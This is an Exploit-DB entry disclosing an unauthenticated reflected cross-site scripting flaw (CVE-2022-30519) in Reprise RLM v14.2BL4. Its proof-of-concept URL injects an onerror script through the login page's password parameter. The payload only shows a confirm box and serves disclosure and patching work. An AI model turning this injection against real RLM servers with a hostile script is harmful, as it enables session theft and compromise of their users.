exploit-db-mirror/exploits/windows/webapps/51188.txt

# Exploit Title:  Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10

# Proof Of Concept:

http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E


Best Regards.